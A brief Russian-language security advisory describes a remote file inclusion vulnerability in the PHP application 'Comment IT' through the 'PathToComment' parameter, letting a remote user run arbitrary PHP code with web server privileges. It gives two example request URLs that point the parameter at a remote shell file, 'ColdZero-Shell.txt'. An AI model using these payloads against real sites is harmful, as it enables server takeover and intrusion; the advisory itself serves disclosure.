Программа: Comment IT

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре "PathToComment" разными сценариями. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Примеры:

Http:// www.Victem.0 / [Comment IT_path] /classes/class_admin.php?PathTo Comment=http://ColdZero-Shell.txt
Http:// www.Victem.0/[Comment IT_path] /classes/class_comments.php?PathTo Comment=http://ColdZero-Shell.txt



Оставить мнение